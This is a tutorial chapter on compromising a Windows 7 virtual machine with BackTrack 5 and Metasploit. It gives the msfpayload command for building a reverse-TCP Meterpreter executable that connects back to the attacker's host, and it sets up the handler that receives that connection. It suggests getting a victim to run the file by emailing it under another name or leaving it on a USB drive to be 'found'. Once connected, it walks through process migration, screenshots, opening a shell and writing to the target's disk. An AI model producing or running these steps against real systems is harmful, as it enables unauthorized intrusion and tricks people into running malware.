Chapter 4 - Running an Exploit against a Window 7 machine.

We are going to use BackTrack 5 and Metasploit to gain access to the Windows 7 VM on our network. Part of the Metasploit Framework includes a tool called Meterpreter, this is the tool we are going to use to gain access to our Windows 7 VM. To get started here is the definition of Meterpreter from the official pdf for those who do not know what it is: Meterpreter, short for The Meta-Interpreter is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared object (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. As we are running this attack on a LAN the attacking machines IP address is used as LHOST (local host) and LPORT (local port) Start Backtrack and open a new terminal window. Enter the following command: root@bt:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 x > /root/Payload1.exe

It may take a minute to create, finally you will see the following output: Created by msfpayload (http://www.metasploit.com). Payload: windows/meterpreter/reverse_tcp Length: 290 Options: LHOST=192.168.1.4, LPORT=4444 root@bt:~#

The file payload1.exe is now located in the /root of the drive. Select Places__Computer to browse for the file.

Select Root and the file should be in the right window. Copy the file to a USB drive.

The file Payload1.exe needs to be executed on the target PC. This may involve emailing the file (with a different name) or leaving it on a USB drive and letting a user "find" the drive. Open a new terminal window and start Metasploit. We now need to execute the exploit. Type the following into the new terminal window root@bt:~# msfconsole msf > use exploit/multi/handler (press enter) msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp (press enter) PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) >

Next we need to modify some options. Enter the following to set the IP and port number of the attack PC. msf exploit(handler) > set LHOST 192.168.1.4 (press enter) LHOST => 192.168.1.4 msf exploit(handler) > set LPORT 4444 (press enter) LPORT => 4444

Finally type "exploit" to execute. msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.4:4444 [*] Starting the payload handler...

The process will now wait until the payload1.exe file is run. Once it has been executed you will see the following output

The target system is now open and we can begin to look around. We are going to connect to explorer.exe on the target PC next. Type ps to see targets services.

Look through the list to find the PID of explorer.exe. [b] 1380 explorer.exe x86 1 SERMERSOOQ\ilin C:\Windows\Explorer.EXE[/b] Once you have found it type the following into the terminal. meterpreter > migrate 1380 [*] Migrating to 1380... [*] Migration completed successfully. meterpreter >

We can now access further information on the target PC. Sysinfo will detail the targets OS. meterpreter > sysinfo Computer: NUUMOB0088 OS : Windows 7 (Build 7600, ). Arch : x86 Language: da_DK meterpreter > To take screenshot of the targets desktop. meterpreter > screenshot To open a command prompt:

meterpreter > shell

We can now access the targets file system. Type the following: cd.. cd.. mkdir c:\hacked

Open the target VM and browse the hard drive, you should see the newly created folder on the c: drive.